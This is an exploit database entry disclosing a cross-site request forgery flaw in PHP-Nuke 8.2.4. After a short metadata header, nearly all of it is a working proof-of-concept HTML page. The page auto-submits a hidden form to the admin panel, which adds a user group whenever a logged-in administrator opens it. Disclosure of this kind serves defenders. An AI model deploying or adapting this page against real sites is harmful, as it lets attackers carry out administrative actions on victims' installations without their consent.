PHP-Nuke 8.2.4 - Cross-Site Request Forgery

Author: sajith
type: webapps
platform: php
port: 
date_added: 2012-12-11  
date_updated: 2012-12-13  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt23500/phpnuke.png  
application_url: http://www.exploit-db.comphpnuke-release-8.2.4.tar.gz  

raw file: 23289.txt  

###########################################################
[~] Exploit Title:CSRF vulnerability
[~] Author: sajith
[~] version: PHP Nuke 8.2.4
[~] vulnerable app link:http://phpnuke.org/modules.php?name=Release
###########################################################
 [CSRF add group]

<html lang="en">
<head>
<title>CSRF POC( PHP nuke 8.2.4)</title>
</head>
<body>
<form action="http://127.0.0.1/phpnuke-release-8.2.4/phpnuke/html/admin.php"
id="formid" method="post">
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="description"
value="testing+for+CSRF%3Cbr+%2F%3E" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="op" value="grp_add" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>